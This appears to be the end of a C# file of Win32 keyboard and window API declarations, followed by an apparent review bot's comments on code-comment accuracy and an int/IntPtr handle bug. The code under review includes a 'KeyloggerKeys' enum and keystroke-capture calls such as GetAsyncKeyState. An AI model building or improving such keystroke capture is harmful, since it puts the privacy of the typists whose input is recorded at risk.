[DllImport("user32.dll")]
internal static extern IntPtr GetForegroundWindow();
[DllImport("user32.dll")]
internal static extern uint GetWindowThreadProcessId(IntPtr hWnd, out uint lpdwProcessId);
[DllImport("user32.dll", ExactSpelling = true)]
internal static extern IntPtr GetKeyboardLayout(uint threadId);
}
}
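Review bot: The comment above the second `GetAsyncKeyState` overload says the value passed is a scan code, but the parameter is `vKey` and the API takes a virtual-key code, the same values the new `KeyloggerKeys` enum lists. I would replace it with `// GetAsyncKeyState takes a virtual-key code; translate to a character via ToUnicodeEx.` The XML doc on `MapVirtualKeyExW` leaves `<param name="dwhkl">` empty and `<returns>Returns </returns>` unfinished, and the other imports have no summaries at all. `GetWindowText` is now declared with `int hWnd` while the removed declaration and every other handle here use `IntPtr`. The matching `.ToInt32()` at the call site can throw `OverflowException` in a 64-bit process, so `IntPtr hWnd` should be kept.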